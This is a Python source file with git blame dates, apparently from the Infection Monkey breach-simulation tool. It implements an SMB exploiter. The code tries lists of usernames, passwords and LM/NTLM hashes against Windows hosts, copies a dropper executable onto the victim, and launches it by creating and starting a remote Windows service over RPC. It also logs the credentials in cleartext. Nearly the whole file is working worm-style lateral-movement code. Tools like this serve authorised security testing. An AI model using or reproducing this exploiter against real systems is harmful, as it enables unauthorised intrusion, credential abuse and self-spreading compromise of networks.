monkey/chaos_monkey/exploit/smbexec.py

156 lines
6.1 KiB
Python
Raw Normal View History

2015-08-30 15:27:35 +08:00
import sys
from logging import getLogger
2015-11-30 20:11:19 +08:00
from model.host import VictimHost
2017-08-28 15:41:11 +08:00
from model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
2015-11-30 20:11:19 +08:00
from exploit import HostExploiter
from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger
2016-08-20 22:03:49 +08:00
from tools import build_monkey_commandline, report_failed_login
2015-08-30 15:27:35 +08:00
try:
from impacket import smb
from impacket import uuid
2016-08-20 22:03:49 +08:00
# from impacket.dcerpc import dcerpc
2015-08-30 15:27:35 +08:00
from impacket.dcerpc.v5 import transport, scmr
from impacket.smbconnection import SessionError as SessionError1, SMB_DIALECT
from impacket.smb import SessionError as SessionError2
from impacket.smb3 import SessionError as SessionError3
2017-09-26 23:11:13 +08:00
except ImportError as exc:
2015-08-30 15:27:35 +08:00
print str(exc)
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
2017-09-29 00:03:31 +08:00
raise
2015-08-30 15:27:35 +08:00
LOG = getLogger(__name__)
2015-11-30 16:56:20 +08:00
2015-08-30 15:27:35 +08:00
class SmbExploiter(HostExploiter):
_target_os_type = ['windows']
2015-08-30 15:27:35 +08:00
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
2016-08-20 22:03:49 +08:00
}
2015-08-30 15:27:35 +08:00
USE_KERBEROS = False
def __init__(self):
self._config = __import__('config').WormConfiguration
self._guid = __import__('config').GUID
2015-08-30 15:27:35 +08:00
def is_os_supported(self, host):
if host.os.get('type') in self._target_os_type:
return True
if not host.os.get('type'):
2016-08-20 22:03:49 +08:00
is_smb_open, _ = check_port_tcp(host.ip_addr, 445)
if is_smb_open:
smb_finger = SMBFinger()
smb_finger.get_host_fingerprint(host)
else:
2016-08-20 22:03:49 +08:00
is_nb_open, _ = check_port_tcp(host.ip_addr, 139)
if is_nb_open:
host.os['type'] = 'windows'
2015-09-30 20:05:30 +08:00
return host.os.get('type') in self._target_os_type
2016-08-20 22:03:49 +08:00
return False
2015-12-08 01:08:15 +08:00
def exploit_host(self, host, depth=-1, src_path=None):
2015-08-30 15:27:35 +08:00
assert isinstance(host, VictimHost)
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
2016-08-20 22:03:49 +08:00
return False
2017-09-29 00:03:31 +08:00
creds = self._config.get_exploit_user_password_or_hash_product()
2015-08-30 15:27:35 +08:00
exploited = False
2017-09-29 00:03:31 +08:00
for user, password, lm_hash, ntlm_hash in creds:
2015-08-30 15:27:35 +08:00
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(host,
2016-08-20 22:03:49 +08:00
src_path,
self._config.dropper_target_path,
2017-09-26 23:11:13 +08:00
user,
password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout)
2015-08-30 15:27:35 +08:00
if remote_full_path is not None:
2017-09-26 23:11:13 +08:00
LOG.debug("Successfully logged in %r using SMB (%s : %s : %s : %s)",
host, user, password, lm_hash, ntlm_hash)
host.learn_credentials(user, password)
2015-08-30 15:27:35 +08:00
exploited = True
break
else:
2016-08-20 22:03:49 +08:00
# failed exploiting with this user/pass
2017-09-26 23:11:13 +08:00
report_failed_login(self, host, user, password, lm_hash, ntlm_hash)
2015-08-30 15:27:35 +08:00
2017-09-26 23:11:13 +08:00
except Exception as exc:
LOG.debug("Exception when trying to copy file using SMB to %r with user:"
" %s, password: '%s', LM hash: %s, NTLM hash: %s: (%s)", host,
user, password, lm_hash, ntlm_hash, exc)
2015-08-30 15:27:35 +08:00
continue
if not exploited:
LOG.debug("Exploiter SmbExec is giving up...")
return False
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower():
2017-08-28 15:41:11 +08:00
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path}
2015-08-30 15:27:35 +08:00
else:
2017-08-28 15:41:11 +08:00
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path}
2015-08-30 15:27:35 +08:00
2016-08-20 22:03:49 +08:00
cmdline += build_monkey_commandline(host, depth - 1)
2015-08-30 15:27:35 +08:00
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
2016-08-20 22:03:49 +08:00
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr,))
2015-08-30 15:27:35 +08:00
rpctransport.set_dport(port)
2016-08-20 22:03:49 +08:00
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
2015-08-30 15:27:35 +08:00
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
2017-09-26 23:11:13 +08:00
rpctransport.set_credentials(user, password, '',
lm_hash, ntlm_hash, None)
2015-08-30 15:27:35 +08:00
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
scmr_rpc = rpctransport.get_dce_rpc()
try:
scmr_rpc.connect()
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.warn("Error connecting to SCM on exploited machine %r: %s",
host, exc)
return False
smb_conn = rpctransport.get_smb_connection()
break
2015-08-30 15:27:35 +08:00
# We don't wanna deal with timeouts from now on.
smb_conn.setTimeout(100000)
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(scmr_rpc)
sc_handle = resp['lpScHandle']
# start the monkey using the SCM
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
2015-08-30 15:27:35 +08:00
lpBinaryPathName=cmdline)
service = resp['lpServiceHandle']
try:
2016-08-20 22:03:49 +08:00
scmr.hRStartServiceW(scmr_rpc, service)
2015-08-30 15:27:35 +08:00
except:
2015-11-30 16:56:20 +08:00
pass
2015-08-30 15:27:35 +08:00
scmr.hRDeleteService(scmr_rpc, service)
scmr.hRCloseServiceHandle(scmr_rpc, service)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path, host, cmdline)
return True